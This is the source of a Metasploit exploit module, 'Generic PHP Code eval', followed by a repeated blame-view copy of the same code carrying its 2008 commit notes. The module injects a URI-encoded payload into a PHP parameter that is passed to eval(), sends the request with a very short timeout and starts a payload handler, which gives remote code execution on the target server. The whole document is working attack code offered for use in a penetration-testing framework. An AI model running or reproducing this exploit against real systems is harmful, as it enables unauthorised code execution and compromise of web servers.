metasploit-framework/modules/exploits/unix/webapp/php_eval.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Generic PHP Code eval',
			'Description'    => %q{
				Exploits things like <?php eval($_REQUEST['evalme']); ?>
				It is likely that HTTP evasion options will break this exploit.
			},
			'Author'         => [ 'egypt' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => [ ],
			'Privileged'     => false,
			'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
			'Payload'        => 
				{
					'Space'       => 4000,  # max url length for some old
											# versions of apache according to
											# http://www.boutell.com/newfaq/misc/urllength.html
					'DisableNops' => true,
					'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
					'Compat'      => 
						{
							'ConnectionType' => 'find',
						},
					'Keys'        => ['php'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0
			))

		register_options(
			[
				OptString.new('URIPATH',   [ true,  "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
			], self.class)
	
	end

	def exploit
		# very short timeout because the request may never return if we're
		# sending a socket payload
		timeout = 0.01

		uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(payload.encoded))
		response = send_request_raw({ 'uri' => uri },timeout)
		
		handler
	end
end
fixes #198; generic php eval exploit git-svn-id: file:///home/svn/framework3/trunk@5746 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-13 05:55:10 +00:00			`##`
Set property 'svn:keywords' git-svn-id: file:///home/svn/framework3/trunk@5783 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-23 02:43:21 +00:00			`# $Id$`
fixes #198; generic php eval exploit git-svn-id: file:///home/svn/framework3/trunk@5746 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-13 05:55:10 +00:00			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


			`require 'msf/core'`


			`class Metasploit3 < Msf::Exploit::Remote`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Generic PHP Code eval',`
			`'Description' => %q{`
			`Exploits things like <?php eval($_REQUEST['evalme']); ?>`
			`It is likely that HTTP evasion options will break this exploit.`
			`},`
			`'Author' => [ 'egypt' ],`
			`'License' => BSD_LICENSE,`
Set property 'svn:keywords' git-svn-id: file:///home/svn/framework3/trunk@5783 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-23 02:43:21 +00:00			`'Version' => '$Revision$',`
fixes #198; generic php eval exploit git-svn-id: file:///home/svn/framework3/trunk@5746 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-13 05:55:10 +00:00			`'References' => [ ],`
			`'Privileged' => false,`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Payload' =>`
			`{`
			`'Space' => 4000, # max url length for some old`
			`# versions of apache according to`
			`# http://www.boutell.com/newfaq/misc/urllength.html`
			`'DisableNops' => true,`
			'BadChars' => %q\|'"`\|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
			`'Compat' =>`
			`{`
			`'ConnectionType' => 'find',`
			`},`
			`'Keys' => ['php'],`
			`},`
			`'Targets' => [ ['Automatic', { }], ],`
			`'DefaultTarget' => 0`
			`))`

			`register_options(`
			`[`
			`OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),`
			`], self.class)`

			`end`

			`def exploit`
			`# very short timeout because the request may never return if we're`
			`# sending a socket payload`
			`timeout = 0.01`

			`uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(payload.encoded))`
			`response = send_request_raw({ 'uri' => uri },timeout)`

			`handler`
			`end`
Code cleanups git-svn-id: file:///home/svn/framework3/trunk@5773 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-19 21:03:39 +00:00			`end`